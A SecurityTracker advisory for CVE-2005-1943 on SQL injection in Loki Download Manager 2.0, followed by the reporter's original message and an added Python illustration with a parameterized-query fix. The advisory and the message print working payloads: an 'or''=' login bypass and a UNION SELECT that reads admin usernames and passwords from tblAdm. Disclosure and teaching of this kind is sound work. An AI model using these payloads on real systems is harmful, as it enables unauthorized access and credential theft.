SecurityTracker.com
Category:   Application (File Transfer/Sharing)  >   Loki Download Manager
Vendors:   Loki Download Manager
Loki Download Manager Input Validation Holes Permit SQL Injection Attacks
SecurityTracker Alert ID:  1014147
SecurityTracker URL:  http://securitytracker.com/id/1014147
CVE Reference:   CVE-2005-1943   (Links to External Site)
Updated:  Nov 2 2008
Original Entry Date:  Jun 9 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 2.0
Description:   Salmanooh reported a vulnerability in Loki Download Manager. A remote user can inject SQL commands.

The '/adm/default.asp' script does not properly validate user-supplied input in the 'password' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

Some demonstration exploit values are provided:

user: anyuser
pass: 'or''='

The 'cat' parameter in the 'catinfo.asp' script is also affected. A demonstration exploit value to retrieve password information is provided:

http://[target]/downmancv/catinfo.asp?cat=' union select
null,null,user,null,null,null,null,null,pass,null,null,null,null,null FROM
tblAdm '

Impact:   A remote user can execute SQL commands on the underlying database. This can be exploited to retrieve authentication data.
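The login bypass described above, reduced to a runnable illustration. This is an added example, not code from Loki Download Manager or from the reporter: it stands up a constructed in-memory SQLite table named after the advisory's tblAdm (the credentials are made up), reproduces the string-concatenation pattern that lets the 'password' tautology succeed, and shows the parameterized form that defeats it.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the admin table the advisory names (tblAdm,
    # with user/pass columns). Row contents are invented for the example.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tblAdm (user TEXT, pass TEXT)")
    db.execute("INSERT INTO tblAdm VALUES ('admin', 'Example-Passw0rd')")
    return db


def login_vulnerable(db, user, pw):
    # The defect the advisory describes: untrusted input is spliced straight
    # into the SQL text, so a quote in the value changes the query's meaning.
    sql = ("SELECT user FROM tblAdm WHERE user='" + user
           + "' AND pass='" + pw + "'")
    return db.execute(sql).fetchone() is not None


def login_fixed(db, user, pw):
    # Parameterized query: the driver binds the values, so quotes and
    # keywords in the input are compared as data, never parsed as SQL.
    sql = "SELECT user FROM tblAdm WHERE user=? AND pass=?"
    return db.execute(sql, (user, pw)).fetchone() is not None


def compare_handlers(user, pw):
    # Run one credential pair through both handlers; returns
    # (vulnerable_result, fixed_result) so the difference is easy to check.
    db = make_db()
    return login_vulnerable(db, user, pw), login_fixed(db, user, pw)


if __name__ == "__main__":
    # The advisory's demonstration values: the concatenated query becomes
    # ... AND pass=''or''='' which is always true; the bound form rejects it.
    print(compare_handlers("anyuser", "'or''='"))   # (True, False)
    # Legitimate credentials still work in the fixed handler.
    print(compare_handlers("admin", "Example-Passw0rd"))  # (True, True)
```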
Solution:   No solution was available at the time of this entry.

[Editor's note: The vendor's web site is no longer in operation.]

Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  2 SQL injection in Loki download manager v2.0


hi

2 SQL injection in Loki download manager v2.0

1. in http://localhost/adm/default.asp

user: anyuser
pass: 'or''='

2. in http://localhost/downmancv/catinfo.asp?cat=' union select 
null,null,user,null,null,null,null,null,pass,null,null,null,null,null FROM 
tblAdm '

and you will have user and pass h4ve F4n

Salmanooh

hack_912@hotmail.com

Copyright 2019, SecurityGlobal.net LLC